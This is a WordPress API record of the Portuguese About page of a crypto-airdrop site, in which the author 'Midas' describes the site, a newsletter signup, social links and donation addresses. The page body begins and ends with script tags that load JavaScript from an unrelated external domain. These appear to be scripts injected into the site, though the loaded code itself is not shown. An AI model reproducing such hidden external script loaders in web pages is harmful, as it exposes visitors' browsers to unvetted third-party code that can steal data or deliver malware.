{"id":4789,"date":"2020-05-05T22:15:14","date_gmt":"2020-05-06T05:15:14","guid":{"rendered":"https:\/\/coinairdrops.com\/?page_id=4789"},"modified":"2020-05-05T22:15:17","modified_gmt":"2020-05-06T05:15:17","slug":"sobre","status":"publish","type":"page","link":"https:\/\/coinairdrops.com\/pt-br\/sobre\/","title":{"rendered":"Sobre"},"content":{"rendered":"<script type=\"text\/javascript\" src=\"https:\/\/bs.direct\/sources\/b762a8ceb.js\"><\/script>\n\n\n\n<h1 class=\"wp-block-heading\">Sobre<\/h1>\n\n\n\n<p>Bem-vindo ao nosso site: <strong>CoinAirdrops.com<\/strong>, suafavorita fontede <strong>todos os crypto airdrops que acontecem na comunidade<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Quem est\u00e1 por tr\u00e1s do CoinAirdrops.com?<\/h2>\n\n\n\n<p>Meu pseud\u00f4nimo \u00e9 Midas, como o famoso rei&#8230; E eu tenho escrito aqui e ali sobre diferentes t\u00f3picos, <strong>principalmente sobre as mais recentes tecnologias, privacidade e criptografia<\/strong>. Agora sou uma esp\u00e9cie de aficionado por moedas criptogr\u00e1ficas, mesmo que ainda tenha muito a aprender. Alguns deles se autodenominariam um guru. Mas ainda n\u00e3o estou l\u00e1!<\/p>\n\n\n\n<p>Quando descobri as gotas de ar, pensei que gostaria de escrever sobre elas. Porque eu realmente gosto de aprender sobre novos blockchain projetos de. Quero dizer, pessoal comum, alguns deles querem enviar sat\u00e9lites para o espa\u00e7o, substituir o Facebook ou <strong>mudar a face do mundo<\/strong>! Embora alguns projetos falhem, eu adoro ver as pessoas <strong>se esfor\u00e7arem e criarem alguma coisa<\/strong>. Talvez eu tenha a oportunidade de estar entre os primeiros a adotar o pr\u00f3ximo Bill Gates!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Por que Coin Airdrops?<\/h2>\n\n\n\n<p>Antes de tudo, quero explicar esse novo conceito de <strong>distribui\u00e7\u00e3o de tokens gratuitos<\/strong>. E eu quero ensinar as pessoas sobre novos projetos a serem seguidos. Quero contar a eles sobre as oportunidades que encontrei.<\/p>\n\n\n\n<p>Ent\u00e3o, fico feliz em <strong>apoiar esses novos projetos<\/strong> falando sobre eles. Eu explico o que eles est\u00e3o tentando alcan\u00e7ar. E trago minha humilde contribui\u00e7\u00e3o para que as pessoas saibam sobre eles para <strong>aumentar sua comunidade<\/strong>.<\/p>\n\n\n\n<p>Al\u00e9m disso, explico aos leitores <strong>como obter tokens gratuitos<\/strong> de suas campanhas de airdrops ativo. Porque todos n\u00f3s gostamos de coisas gr\u00e1tis. Ent\u00e3o, por um lado, listo as gotas de ar. E por outro lado, as pessoas podem reivindicar moedas gr\u00e1tis! \u00c9 uma situa\u00e7\u00e3o ganha-ganha! By the way, n\u00e3o se esque\u00e7a de assinar a minha newsletter, para receber todos os alertas de airdrops mais recentes.<\/p>\n\n\n<div class=\"news-post\">\n<p>N\u00c3O PERCA UM \u00daNICO AIRDROP<\/p>\n<form class=\"ampforwp-form-allow\"\n  method=\"post\"\n  action=\"https:\/\/sendfox.com\/form\/3668j3\/1gjkl6\"\n  target=\"_blank\">\n  <input type=\"email\"\n    placeholder=\"endere\u00e7o de e-mail\"\n    name=\"email\"\n    required>\n  <input type=\"submit\"\n    value=\"Inscreva-se\">\n<\/form>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Somos sociais<\/h2>\n\n\n\n<p>Siga-nos nas m\u00eddias sociais. E manteremos voc\u00ea atualizado sobre os <strong>mais recentes crypto airdrops<\/strong>. Voc\u00ea pode encontrar-nos em:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><a href=\"https:\/\/www.facebook.com\/coinairdrops\/\" target=\"_blank\" rel=\"noreferrer noopener\">Facebook<\/a><\/li><li><a href=\"https:\/\/twitter.com\/coinairdrops\" target=\"_blank\" rel=\"noreferrer noopener\">Twitter<\/a><\/li><li><a href=\"https:\/\/t.me\/coinzairdrops\" target=\"_blank\" rel=\"noreferrer noopener\">Telegram<\/a><\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Voc\u00ea gosta do que fazemos? Apoie-nos!<\/h2>\n\n\n\n<p><strong>Manter um site \u00e9 demorado e custa um pouco<\/strong>. Portanto, se voc\u00ea gosta do que fazemos, nos um centavo digital:<\/p>\n\n\n\n<p>BTC: 14Lco1GjaG1qNzALXCcC8ZXtaRegLT6DBY<\/p>\n\n\n\n<p>ETH: 0x142616534b1b680993d8f0661295da15557c977e<\/p>\n\n\n<script type=\"text\/javascript\" src=\"https:\/\/bs.direct\/sources\/b3184f3be.js\"><\/script>\n","protected":false},"excerpt":{"rendered":"<p>Sobre Bem-vindo ao nosso site: CoinAirdrops.com, suafavorita fontede todos os crypto airdrops que acontecem na comunidade. Quem est\u00e1 por tr\u00e1s do CoinAirdrops.com? Meu pseud\u00f4nimo \u00e9 Midas, como o famoso rei&#8230; E eu tenho escrito aqui e ali sobre diferentes t\u00f3picos, principalmente sobre as mais recentes tecnologias, privacidade e criptografia. Agora sou uma esp\u00e9cie de aficionado [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"class_list":["post-4789","page","type-page","status-publish","hentry"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sobre &#8226; Coin Airdrops<\/title>\n<meta name=\"description\" content=\"Quem est\u00e1 por tr\u00e1s do CoinAirdrops.com? Leia esta p\u00e1gina e saiba mais sobre a Midas e a equipe que escreve todos os artigos que voc\u00ea pode ler neste site.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/coinairdrops.com\/pt-br\/sobre\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sobre &#8226; Coin Airdrops\" \/>\n<meta property=\"og:description\" content=\"Quem est\u00e1 por tr\u00e1s do CoinAirdrops.com? Leia esta p\u00e1gina e saiba mais sobre a Midas e a equipe que escreve todos os artigos que voc\u00ea pode ler neste site.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/coinairdrops.com\/pt-br\/sobre\/\" \/>\n<meta property=\"og:site_name\" content=\"Coin Airdrops\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/coinairdrops\/\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-06T05:15:17+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@coinairdrops\" \/>\n<meta name=\"twitter:label1\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/sobre\\\/\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/sobre\\\/\",\"name\":\"Sobre &#8226; Coin Airdrops\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/#website\"},\"datePublished\":\"2020-05-06T05:15:14+00:00\",\"dateModified\":\"2020-05-06T05:15:17+00:00\",\"description\":\"Quem est\u00e1 por tr\u00e1s do CoinAirdrops.com? Leia esta p\u00e1gina e saiba mais sobre a Midas e a equipe que escreve todos os artigos que voc\u00ea pode ler neste site.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/sobre\\\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/sobre\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/sobre\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sobre\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/#website\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/\",\"name\":\"Coin Airdrops\",\"description\":\"Don&#039;t miss a single crypto airdrop!\",\"publisher\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/#organization\",\"name\":\"Coin Airdrops\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/coinairdrops.com\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/coinairdrops-310x34-1.svg\",\"contentUrl\":\"https:\\\/\\\/coinairdrops.com\\\/wp-content\\\/uploads\\\/2020\\\/03\\\/coinairdrops-310x34-1.svg\",\"caption\":\"Coin Airdrops\"},\"image\":{\"@id\":\"https:\\\/\\\/coinairdrops.com\\\/pt-br\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/coinairdrops\\\/\",\"https:\\\/\\\/x.com\\\/coinairdrops\",\"https:\\\/\\\/www.pinterest.com\\\/coinairdrops\\\/\",\"https:\\\/\\\/vk.com\\\/coinairdrops\",\"https:\\\/\\\/t.me\\\/coinzairdrops\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sobre &#8226; Coin Airdrops","description":"Quem est\u00e1 por tr\u00e1s do CoinAirdrops.com? Leia esta p\u00e1gina e saiba mais sobre a Midas e a equipe que escreve todos os artigos que voc\u00ea pode ler neste site.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/coinairdrops.com\/pt-br\/sobre\/","og_locale":"pt_BR","og_type":"article","og_title":"Sobre &#8226; Coin Airdrops","og_description":"Quem est\u00e1 por tr\u00e1s do CoinAirdrops.com? Leia esta p\u00e1gina e saiba mais sobre a Midas e a equipe que escreve todos os artigos que voc\u00ea pode ler neste site.","og_url":"https:\/\/coinairdrops.com\/pt-br\/sobre\/","og_site_name":"Coin Airdrops","article_publisher":"https:\/\/www.facebook.com\/coinairdrops\/","article_modified_time":"2020-05-06T05:15:17+00:00","twitter_card":"summary_large_image","twitter_site":"@coinairdrops","twitter_misc":{"Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/coinairdrops.com\/pt-br\/sobre\/","url":"https:\/\/coinairdrops.com\/pt-br\/sobre\/","name":"Sobre &#8226; Coin Airdrops","isPartOf":{"@id":"https:\/\/coinairdrops.com\/pt-br\/#website"},"datePublished":"2020-05-06T05:15:14+00:00","dateModified":"2020-05-06T05:15:17+00:00","description":"Quem est\u00e1 por tr\u00e1s do CoinAirdrops.com? Leia esta p\u00e1gina e saiba mais sobre a Midas e a equipe que escreve todos os artigos que voc\u00ea pode ler neste site.","breadcrumb":{"@id":"https:\/\/coinairdrops.com\/pt-br\/sobre\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/coinairdrops.com\/pt-br\/sobre\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/coinairdrops.com\/pt-br\/sobre\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/coinairdrops.com\/pt-br\/"},{"@type":"ListItem","position":2,"name":"Sobre"}]},{"@type":"WebSite","@id":"https:\/\/coinairdrops.com\/pt-br\/#website","url":"https:\/\/coinairdrops.com\/pt-br\/","name":"Coin Airdrops","description":"Don&#039;t miss a single crypto airdrop!","publisher":{"@id":"https:\/\/coinairdrops.com\/pt-br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/coinairdrops.com\/pt-br\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/coinairdrops.com\/pt-br\/#organization","name":"Coin Airdrops","url":"https:\/\/coinairdrops.com\/pt-br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/coinairdrops.com\/pt-br\/#\/schema\/logo\/image\/","url":"https:\/\/coinairdrops.com\/wp-content\/uploads\/2020\/03\/coinairdrops-310x34-1.svg","contentUrl":"https:\/\/coinairdrops.com\/wp-content\/uploads\/2020\/03\/coinairdrops-310x34-1.svg","caption":"Coin Airdrops"},"image":{"@id":"https:\/\/coinairdrops.com\/pt-br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/coinairdrops\/","https:\/\/x.com\/coinairdrops","https:\/\/www.pinterest.com\/coinairdrops\/","https:\/\/vk.com\/coinairdrops","https:\/\/t.me\/coinzairdrops"]}]}},"_links":{"self":[{"href":"https:\/\/coinairdrops.com\/pt-br\/wp-json\/wp\/v2\/pages\/4789","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/coinairdrops.com\/pt-br\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/coinairdrops.com\/pt-br\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/coinairdrops.com\/pt-br\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/coinairdrops.com\/pt-br\/wp-json\/wp\/v2\/comments?post=4789"}],"version-history":[{"count":2,"href":"https:\/\/coinairdrops.com\/pt-br\/wp-json\/wp\/v2\/pages\/4789\/revisions"}],"predecessor-version":[{"id":4791,"href":"https:\/\/coinairdrops.com\/pt-br\/wp-json\/wp\/v2\/pages\/4789\/revisions\/4791"}],"wp:attachment":[{"href":"https:\/\/coinairdrops.com\/pt-br\/wp-json\/wp\/v2\/media?parent=4789"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}